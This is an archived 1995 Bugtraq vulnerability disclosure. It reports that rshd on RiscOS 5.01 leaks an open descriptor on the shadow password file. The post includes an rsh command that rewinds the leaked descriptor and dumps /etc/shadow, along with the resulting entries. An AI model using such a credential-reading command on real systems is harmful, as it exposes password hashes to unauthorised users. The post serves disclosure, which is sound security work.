[2095] in bugtraq


BUG (and exploit): RiscOS 5.01 rshd has FD leaks...

daemon@ATHENA.MIT.EDU (Jeremy Fitzhardinge)
Fri Aug 11 11:18:27 1995

Date:         Fri, 11 Aug 1995 16:20:33 -0500
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Jeremy Fitzhardinge <jeremy@suede.sw.oz.au>
X-To:         bugtraq@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>

Hi all,

When rsh'ing to a RiscOS 5.01 machine, the process being run has a file
descriptor open RO on the shadow password file.  A simple program to
seek it back to 0 and copy will reveal the encrypted passwords to
anyone who can rsh to the machine.

suite is a Mips RiscOS 5.01 machine; suede is a Solaris box

: suite:4; ls -li /etc/shadow
  4409 -r--------  1 root         4072 Aug 11 08:48 /etc/shadow

: suede:21; rsh suite t/openfd
21 Dev (33, 0), ino 2679, type character special
20 Dev (33, 0), ino 2679, type character special
8 Dev (255, 255), ino 13566, type FIFO
7 Dev (33, 0), ino 4409, type regular file      *****
4 Dev (33, 0), ino 4409, type regular file      *****
2 Dev (255, 255), ino 13566, type FIFO
1 Dev (0, 0), ino 0, type Unknown
Numeric type: 0
0 Dev (0, 0), ino 0, type Unknown
Numeric type: 0

(seek0 just seeks its stdin to offset 0)
: suede:21; rsh suite '(t/seek0; cat)</dev/fd/7'
root:oHnoyOuDOnt:9334::::::
setup:*NOLOGIN*:8603::::::
sysadm:*NOLOGIN*:8603::::::
daemon:*NOLOGIN*:8603::::::
bin:*NOLOGIN*:8603::::::
...


I'm curious about the pipes as well; what are they to?  I think the "unknown"
file descriptors are sockets; fstat doesn't seem to cope with them.

        J
